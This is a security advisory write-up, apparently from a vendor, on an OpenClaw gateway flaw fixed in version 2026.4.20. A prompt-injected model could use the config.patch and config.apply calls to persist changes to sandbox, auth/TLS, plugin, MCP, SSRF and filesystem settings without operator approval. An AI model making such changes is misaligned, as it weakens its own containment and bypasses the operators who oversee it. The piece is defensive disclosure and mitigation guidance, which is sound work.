What happened

OpenClaw’s agent-facing gateway operations gateway config.patch and config.apply failed to fully guard operator‑trusted fields prior to version 2026.4.20, enabling a model to persist sensitive configuration changes outside its intended scope GitHub Advisory. The vulnerable range is all openclaw npm releases < 2026.4.20, with fixes shipped in 2026.4.20 GHSA-7jm2-g593-4qrc. The issue is explicitly a model‑to‑operator guard bypass, not a remote unauthenticated gateway compromise, and is rated medium severity advisory summary.

A prompt‑injected model with access to the owner‑only gateway tool could change guarded settings via these config mutation flows, persisting changes that should have required operator control OpenClaw advisory. The fix extends the block on model‑driven config mutations to a broader set of trusted paths and correctly handles per‑agent overrides and array‑entry patching fix noted. The remediation shipped in commit fe30b31a97a917ecc6e92f6c85378b6b20352422 as part of the 2026.4.20 release fix commit in advisory.

Why it matters

The guard gap covered operator‑trusted knobs that define the security posture of the gateway and its connected agents, allowing a compromised or coerced model to degrade protections without operator review GHSA. Exposed settings included:

• Sandbox policy, which constrains agent execution advisory
• Plugin enablement, which gates capability expansion advisory
• Gateway auth/TLS, foundational for channel integrity advisory
• Hook routing, which directs privileged flows advisory
• MCP server configuration, controlling model‑capability plumbing advisory note
• SSRF policy, a core egress safety boundary advisory
• Filesystem hardening, limiting persistent impact advisory

If a model can toggle any of these without human approval, it can silently weaken containment and trust boundaries, despite the gateway intending to restrict model‑originated config writes to safer surfaces GHSA summary. That’s the textbook model‑to‑operator guard bypass scenario the advisory calls out, not a gateway takeover from the network edge advisory scope.

Technical detail

OpenClaw exposes agent‑facing config mutation flows (config.patch / config.apply) meant to accept limited, low‑risk changes from model‑driven operations, with a guard layer intended to deny writes to privileged paths GHSA details. The guard’s coverage was incomplete: several operator‑trusted settings sat outside the protected path set, allowing an agent‑originated patch to change them and persist those changes advisory impact. This included sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening, which should require operator action advisory list.

The threat model is specific: a prompt‑injected model that can use an owner‑only gateway tool could drive these calls and write to privileged configuration fields, circumventing the intended operator approval step threat model in GHSA. The project’s fix expands the blocked operator‑trusted path set, explicitly preventing model‑driven mutations across those sensitive areas, and adds coverage for per‑agent overrides and array‑entry patching cases that previously slipped the filter fix description. The maintainers shipped the remediation in 2026.4.20, tied to commit fe30b31a97a917ecc6e92f6c85378b6b20352422 per the advisory release note.

Defense

• Upgrade immediately to OpenClaw 2026.4.20 to receive the broadened guard coverage for operator‑trusted paths and the per‑agent/array‑entry protections upgrade guidance.
• Audit gateway configuration for drift in the previously unprotected areas: sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening, especially if agents had any config mutation capability pre‑patch advisory list.
• Restrict agent access to the owner‑only gateway tool and scrutinize any automation that routes model prompts to config mutation endpoints (config.patch / config.apply) advisory scope.
• Instrument detection around gateway config changes, alerting on mutations to the operator‑trusted path set now called out by the project, and verify changes were initiated by an operator, not a model workflow GHSA references.
• Treat model prompts that self‑request capability or policy changes as high‑risk and require explicit human approval when they intersect with the enumerated sensitive fields threat framing.

Lyrie Verdict

This is a clean model‑to‑operator guard bypass: the model can drive config.patch / config.apply to flip high‑impact switches unless you stop it at machine speed GHSA framing. Lyrie’s autonomous detectors should enforce an allowlist for agent‑originated gateway config writes, explicitly blocking the operator‑trusted paths enumerated by OpenClaw and correlating prompt content that seeks capability/policy changes with ensuing config mutation attempts in real time advisory list. We recommend continuous telemetry on those paths, source attribution to operator vs. model, and automatic rollback when a model‑sourced mutation touches sandbox, plugin enablement, auth/TLS, hook routing, MCP config, SSRF, or filesystem hardening—before the change propagates advisory detail. Autonomous containment here is non‑negotiable: block, alert, and require human sign‑off for any agent‑initiated write to the protected set now covered in 2026.4.20 release note.